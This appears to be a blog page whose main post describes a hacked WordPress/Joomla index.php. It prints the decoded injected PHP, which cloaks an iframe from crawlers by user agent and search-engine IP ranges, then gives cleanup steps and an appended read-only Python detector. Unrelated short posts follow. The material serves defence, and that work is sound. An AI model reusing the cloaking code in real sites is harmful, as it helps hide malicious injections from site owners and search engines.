
WordPress, Joomla and other sites were hacked: iFrame Injection Attack

I just found the following code in the index.php file located in the root or \htdocs\ folder:

eval(base64_decode('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'));

Using a base64 decoder, the code was deciphered:

error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
$stop_ips_masks = array(
	array("216.239.32.0","216.239.63.255"),
	array("64.68.80.0"  ,"64.68.87.255"  ),
	array("66.102.0.0",  "66.102.15.255"),
	array("64.233.160.0","64.233.191.255"),
	array("66.249.64.0", "66.249.95.255"),
	array("72.14.192.0", "72.14.255.255"),
	array("209.85.128.0","209.85.255.255"),
	array("198.108.100.192","198.108.100.207"),
	array("173.194.0.0","173.194.255.255"),
	array("216.33.229.144","216.33.229.151"),
	array("216.33.229.160","216.33.229.167"),
	array("209.185.108.128","209.185.108.255"),
	array("216.109.75.80","216.109.75.95"),
	array("64.68.88.0","64.68.95.255"),
	array("64.68.64.64","64.68.64.127"),
	array("64.41.221.192","64.41.221.207"),
	array("74.125.0.0","74.125.255.255"),
	array("65.52.0.0","65.55.255.255"),
	array("74.6.0.0","74.6.255.255"),
	array("67.195.0.0","67.195.255.255"),
	array("72.30.0.0","72.30.255.255"),
	array("38.0.0.0","38.255.255.255")
	);
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
	$first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
	if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
	if  (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
if (!$bot) {
echo '<  i fra-me ---removed code for security>';
}

Here are Recent Domains Used by the Malware:

First attempt: I edited the index.php and fixed it! Removed the eval-line.
I reset my password and removed all ftp users.
But within two hours the index-files were hacked again.

Next attempt.
..edited the index.php, removed the eval-line.
I reset my password.
Then, I changed the file permission to 444, so any write permission won’t be allowed. I hope it will stop code being injected through a backdoor script that may exist inside my files.

Update 8 hours:
No sign of code injection attack
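
A read-only check for the same injected line across an entire webroot, added here as an example and not part of the original post: it finds eval(base64_decode('...')) in every .php file, decodes the payload without executing it, and reports which cloaking markers from the decoded code above are present and whether the file still has a write bit set (the 444 step). The function names, marker list and sample files are assumptions constructed for the example.

```python
import base64
import re
import tempfile
from pathlib import Path

# Matches the injected one-liner: eval(base64_decode('...')); with either quote style.
INJECT_RE = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)\s*;?""")
# Strings whose presence in a decoded payload matches the behaviour shown on this page.
MARKERS = ("HTTP_USER_AGENT", "REMOTE_ADDR", "ip2long", "error_reporting(0)", "<iframe")


def scan_file(path):
    """Return one finding per injected eval line; the payload is decoded, never executed."""
    text = Path(path).read_text(errors="replace")
    findings = []
    for m in INJECT_RE.finditer(text):
        try:
            decoded = base64.b64decode(m.group(2)).decode("utf-8", "replace")
        except ValueError:  # malformed base64 still counts as a finding
            decoded = ""
        findings.append({
            "file": str(path),
            "line": text.count("\n", 0, m.start()) + 1,
            "markers": [k for k in MARKERS if k.lower() in decoded.lower()],
            "writable": bool(Path(path).stat().st_mode & 0o222),  # False after chmod 444
        })
    return findings


def scan_tree(root):
    """Scan every .php file under root, not only index.php."""
    return [f for p in sorted(Path(root).rglob("*.php")) for f in scan_file(p)]


def demo():
    """Build a constructed webroot (one clean file, one infected) and scan it."""
    payload = b"error_reporting(0); $ua = $_SERVER['HTTP_USER_AGENT']; /* constructed stand-in */"
    blob = base64.b64encode(payload).decode()
    with tempfile.TemporaryDirectory() as root:
        Path(root, "clean.php").write_text("<?php echo 'hello'; ?>\n")
        Path(root, "index.php").write_text(
            "<?php\neval(base64_decode('%s'));\nrequire 'wp-blog-header.php';\n" % blob)
        return scan_tree(root)


if __name__ == "__main__":
    print(demo())
```

Because the decoded code hides its output from crawler user agents and search-engine address ranges, checking files on disk like this is more reliable than fetching the page with a scanner.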

Lee Min Ho Wallpaper

lee min ho Wallpaper -  이민호

Exercise Machines that Turn Your Sweat Into Electricity


By implementing power-producing exercise machines in this way, gyms can promote themselves as environment friendly and also lessen their electric bills. At least three start-ups in the United States are now selling equipment to retrofit aerobic machines—stationary bicycles, elliptical trainers, and steppers—into electricity-generating gear.

50 Free Photography Resources

Free  Photography Resources

Photography is a pleasing hobby enjoyed by lots of people around the globe. It’s a very entertaining pastime, but also a very technical one. There’s a baffling range of cameras, lenses and accessories, and photographers also have to get to grips with computers and image editing software packages. It can get very perplexing, especially for newcomers to the hobby, and there always seems to be something new to learn, even for skilled photographers.

With this in mind Smashing Magazine listed 50 free resources that will be useful to anyone involved in photography. They compiled a list of the best and most comprehensive websites that will help you get the most out of your photography equipment. You’ll find a gold mine of resources on equipment and technique, and also advice from some of the most active and well-known professional photographers.


Korea Post 17th International Postage Stamp Design Contest

By: Philippine Embassy
The Embassy of the Philippines in Korea encourages all Filipinos both in Korea and in the Philippines to submit entries to the 17th International Postage Stamp Design Contest, organized by the Korea Post.
For this year’s contest, entries will be accepted from 07 July to 06 September 2011, in the theme of “Sharing Hope.” Two Grand Prize winning designs will be issued as postage stamps in 2012.

Contest Guidelines:

Theme: Sharing Hope
(Express the message that we must aid our neighbors around the world who are suffering from poverty, disease, disaster, etc.)

Eligibility:
a. Youth Category: 17 years of age and under
b. General Category : 18 years of age and over

Submission Guidelines:
a. Number of entries submitted: No limit
b. Size of design: 15cm (width) x 20cm (length) or 20cm (width) x 15cm (length)
c. On an A4-sized hardboard, the entry work should be attached on the front and the application form on the back (application forms can be downloaded from the webpage of Korea Post www.koreapost.go.kr or www.koreastamp.go.kr )
d. Only works (including computer graphics) that have not been submitted to other contests shall be accepted and the original copy must be submitted at all times.
e. There are no restrictions in the range of materials and colors used in the works, but three-dimensional works will not be accepted.
f. The design shall not incorporate postage stamp names (themes, subtitles) or the numbers representing the denomination or year of issues.
g. Application period: 07 July to 06 September 2011.
h. For the overseas part, only those works that arrived by 05 September 2011 will be eligible.
i. Address for entries:
Postage Stamps and Philately Division
Korea Post
6 Jongno, Jongno-gu
Seoul, 110-110, Republic of Korea

Prizes:

Grand Prize Winner: Youth Category- KRW 2,000,000
General Category – KRW 3,000,000

For more details on the contest, please refer to the following website:

http://www.koreapost.go.kr/eng/sub/subpage.jsp?contId=e1040214

Google+ Invitations | Try Google+


Google Plus is real-life sharing, rethought for the web. If you want to find out more about Google+, here is a link to the demo: http://www.google.com/+/demo/

Google has invited only a small number of people to test this new project. Now the users who have joined Google+ can invite others to test it. I have also got an invitation and I still have many invites left. So I’m sharing it with all of you here, just fill out the form below:


or leave a comment below:

PS: If you are on Google+, add me to your circle: Nazcar Pine | Google+